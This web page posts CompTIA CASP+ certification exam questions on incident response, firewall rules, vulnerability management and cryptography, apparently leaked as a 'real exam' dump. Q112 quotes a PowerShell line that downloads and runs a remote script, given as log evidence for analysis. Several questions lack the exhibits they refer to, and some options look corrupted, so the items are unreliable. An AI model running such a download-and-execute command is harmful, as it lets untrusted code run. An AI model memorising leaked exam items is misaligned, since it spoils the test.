Title: CAS-004 Actual Questions Answers PDF 100% Cover Real Exam Questions [Q93-Q115]

CAS-004 Exam questions and answers

CompTIA CASP+ Exam Certification Details:
Sample Questions: CompTIA CASP+ Sample Questions
Exam Price: $466 (USD)
Schedule Exam: CompTIA Marketplace / Pearson VUE
Duration: 165 mins
Books / Training: CASP+ CAS-004
Exam Name: CompTIA Advanced Security Practitioner (CASP+)
Number of Questions: 90

Q93. An analyst executes a vulnerability scan against an internet-facing DNS server and receives the following report:
Which of the following tools should the analyst use FIRST to validate the most critical vulnerability?
A. Password cracker
B. Port scanner
C. Account enumerator
D. Exploitation framework

Q94. While investigating a security event, an analyst finds evidence that a user opened an email attachment from an unknown source. Shortly after the user opened the attachment, a group of servers experienced a large amount of network and resource activity. Upon investigating the servers, the analyst discovers the servers were encrypted by ransomware that is demanding payment within 48 hours or all data will be destroyed. The company has no response plans for ransomware.
Which of the following is the NEXT step the analyst should take after reporting the incident to the management team?
A. Pay the ransom within 48 hours.
B. Isolate the servers to prevent the spread.
C. Notify law enforcement.
D. Request that the affected servers be restored immediately.

Q95. Immediately following the report of a potential breach, a security engineer creates a forensic image of the server in question as part of the organization's incident response procedure.
Which of the following must occur to ensure the integrity of the image?
A. The image must be password protected against changes.
B. A hash value of the image must be computed.
C. The disk containing the image must be placed in a sealed container.
D. A duplicate copy of the image must be maintained.

Q96. A security architect is reviewing the following proposed corporate firewall architecture and configuration:
Both firewalls are stateful and provide Layer 7 filtering and routing. The company has the following requirements:
- Web servers must receive all updates via HTTP/S from the corporate network.
- Web servers should not initiate communication with the Internet.
- Web servers should only connect to preapproved corporate database servers.
- Employees' computing devices should only connect to web services over ports 80 and 443.
Which of the following should the architect recommend to ensure all requirements are met in the MOST secure manner? (Choose two.)
A. Add the following to Firewall_A: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0/0 TCP 80,443
B. Add the following to Firewall_A: 15 PERMIT FROM 192.168.1.0/24 TO 0.0.0.0 TCP 80,443
C. Add the following to Firewall_A: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0/0 TCP/UDP 0-65535
D. Add the following to Firewall_B: 15 PERMIT FROM 0.0.0.0/0 TO 10.0.0.0/16 TCP/UDP 0-65535
E. Add the following to Firewall_B: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0 TCP/UDP 0-65535
F. Add the following to Firewall_B: 15 PERMIT FROM 192.168.1.0/24 TO 10.0.2.10/32 TCP 80,443

Q97. The Chief Information Officer (CIO) of a large bank, which uses multiple third-party organizations to deliver a service, is concerned about the handling and security of customer data by the parties. Which of the following should be implemented to BEST manage the risk?
A. Establish a review committee that assesses the importance of suppliers and ranks them according to contract renewals. At the time of contract renewal, incorporate designs and operational controls into the contracts and a right-to-audit clause. Regularly assess the supplier's post-contract renewal with a dedicated risk management team.
B. Establish a team using members from first-line risk, the business unit, and vendor management to assess only design security controls of all suppliers. Store findings from the reviews in a database for all other business units and risk teams to reference.
C. Establish an audit program that regularly reviews all suppliers regardless of the data they access, how they access the data, and the type of data. Review all design and operational controls based on a best-practice standard and report the findings back to upper management.
D. Establish a governance program that rates suppliers based on their access to data, the type of data, and how they access the data. Assign key controls that are reviewed and managed based on the supplier's rating. Report findings to the business units that rely on the suppliers and the various risk teams.

Q98. An organization is planning for disaster recovery and continuity of operations.
INSTRUCTIONS
Review the following scenarios and instructions. Match each relevant finding to the affected host.
After associating scenario 3 with the appropriate host(s), click the host to select the appropriate corrective action for that finding.
Each finding may be used more than once.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Q99. A security analyst is reviewing the following vulnerability assessment report:
Which of the following should be patched FIRST to minimize attacks against Internet-facing hosts?
A. Server1
B. Server2
C. Server 3
D. Servers

Q100. A company suspects a web server may have been infiltrated by a rival corporation. The security engineer reviews the web server logs and finds the following:
The security engineer looks at the code with a developer, and they determine the log entry is created when the following line is run:
Which of the following is an appropriate security control the company should implement?
A. Restrict directory permission to read-only access.
B. Use server-side processing to avoid XSS vulnerabilities in path input.
C. Separate the items in the system call to prevent command injection.
D. Parameterize a query in the path variable to prevent SQL injection.

Q101. A company's employees are not permitted to access company systems while traveling internationally. The company email system is configured to block logins based on geographic location, but some employees report their mobile phones continue to sync email while traveling. Which of the following is the MOST likely explanation? (Select TWO.)
A. Outdated escalation attack
B. Privilege escalation attack
C. VPN on the mobile device
D. Unrestricted email administrator accounts
E. Chief use of UDP protocols
F. Disabled GPS on mobile devices

Q102. A company is looking to fortify its cybersecurity defenses and is focusing on its network infrastructure. The solution cannot affect the availability of the company's services, to ensure false positives do not drop legitimate traffic.
Which of the following would satisfy the requirement?
A. NIDS
B. NIPS
C. WAF
D. Reverse proxy
Reference: https://owasp.org/www-community/controls/Intrusion_Detection

Q103. A security analyst is investigating a series of suspicious emails reported by employees to the security team. The emails appear to come from a current business partner and do not contain images or URLs. No images or URLs were stripped from the messages by the security tools the company uses; instead, the emails only include the following in plain text:
Which of the following should the security analyst perform?
A. Contact the security department at the business partner and alert them to the email event.
B. Block the IP address for the business partner at the perimeter firewall.
C. Pull the devices of the affected employees from the network in case they are infected with a zero-day virus.
D. Configure the email gateway to automatically quarantine all messages originating from the business partner.

Q104. A high-severity vulnerability was found on a web application and introduced to the enterprise. The vulnerability could allow an unauthorized user to utilize an open-source library to view privileged user information. The enterprise is unwilling to accept the risk, but the developers cannot fix the issue right away.
Which of the following should be implemented to reduce the risk to an acceptable level until the issue can be fixed?
A. Scan the code with a static code analyzer, change privileged user passwords, and provide security training.
B. Change privileged usernames, review the OS logs, and deploy hardware tokens.
C. Implement MFA, review the application logs, and deploy a WAF.
D. Deploy a VPN, configure an official open-source library repository, and perform a full application review for vulnerabilities.

Q105. A company's SOC has received threat intelligence about an active campaign utilizing a specific vulnerability. The company would like to determine whether it is vulnerable to this active campaign.
Which of the following should the company use to make this determination?
A. Threat hunting
B. A system penetration test
C. Log analysis within the SIEM tool
D. The Cyber Kill Chain

Q106. An auditor is reviewing the logs from a web application to determine the source of an incident. The web application architecture includes an Internet-accessible application load balancer, a number of web servers in a private subnet, application servers, and one database server in a tiered configuration. The application load balancer cannot store the logs. The following are sample log snippets:
Which of the following should the auditor recommend to ensure future incidents can be traced back to the sources?
A. Enable the X-Forwarded-For header at the load balancer.
B. Install a software-based HIDS on the application servers.
C. Install a certificate signed by a trusted CA.
D. Use stored procedures on the database server.
E. Store the value of the $_SERVER['REMOTE_ADDR'] received by the web servers.

Q107. A developer is creating a new mobile application for a company. The application uses a REST API and TLS 1.2 to communicate securely with the external back-end server. Due to this configuration, the company is concerned about HTTPS interception attacks.
Which of the following would be the BEST solution against this type of attack?
A. Cookies
B. Wildcard certificates
C. HSTS
D. Certificate pinning

Q108. A vulnerability analyst identified a zero-day vulnerability in a company's internally developed software. Since the current vulnerability management system does not have any checks for this vulnerability, an engineer has been asked to create one.
Which of the following would be BEST suited to meet these requirements?
A. ARF
B. ISACs
C. Node.js
D. OVAL

Q109. Which of the following is the MOST important security objective when applying cryptography to control messages that tell an ICS how much electrical power to output?
A. Improving the availability of messages
B. Ensuring non-repudiation of messages
C. Enforcing protocol conformance for messages
D. Assuring the integrity of messages

Q110. Device event logs sourced from MDM software are as follows:
Which of the following security concerns and response actions would BEST address the risks posed by the device in the logs?
A. Malicious installation of an application; change the MDM configuration to remove application ID 1220.
B. Resource leak; recover the device for analysis and clean up the local storage.
C. Impossible travel; disable the device's account and access while investigating.
D. Falsified status reporting; remotely wipe the device.

Q111. A security analyst notices a number of SIEM events that show the following activity:
Which of the following response actions should the analyst take FIRST?
A. Disable powershell.exe on all Microsoft Windows endpoints.
B. Restart Microsoft Windows Defender.
C. Configure the forward proxy to block 40.90.23.154.
D. Disable local administrator privileges on the endpoints.

Q112. A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file:
powershell IEX(New-Object Net.WebClient).DownloadString('https://content.comptia.org/casp/whois.psl');whois
Which of the following security controls would have alerted on and prevented the next phase of the attack?
A. Antivirus and UEBA
B. Reverse proxy and sandbox
C. EDR and application approved list
D. Forward proxy and MFA
An EDR and a whitelist should protect against this attack.

Q113. A company is repeatedly being breached by hackers who use valid credentials. The company's Chief Information Security Officer (CISO) has installed multiple controls for authenticating users, including biometric and token-based factors. Each successive control has increased overhead and complexity but has failed to stop further breaches. An external consultant is evaluating the process currently in place to support the authentication controls. Which of the following recommendations would MOST likely reduce the risk of unauthorized access?
A. Implement strict three-factor authentication.
B. Implement least privilege policies.
C. Switch to one-time or all user authorizations.
D. Strengthen identity-proofing procedures.

Q114. A vulnerability assessment endpoint generated a report of the latest findings. A security analyst needs to review the report and create a priority list of items that must be addressed. Which of the following should the analyst use to create the list quickly?
A. Business impact rating
B. CVE dates
C. CVSS scores
D. OVAL

Q115. A company wants to protect its intellectual property from theft. The company has already applied ACLs and DACs.
Which of the following should the company use to prevent data theft?
A. Watermarking
B. DRM
C. NDA
D. Access logging

Post date: 2023-02-13 09:33:17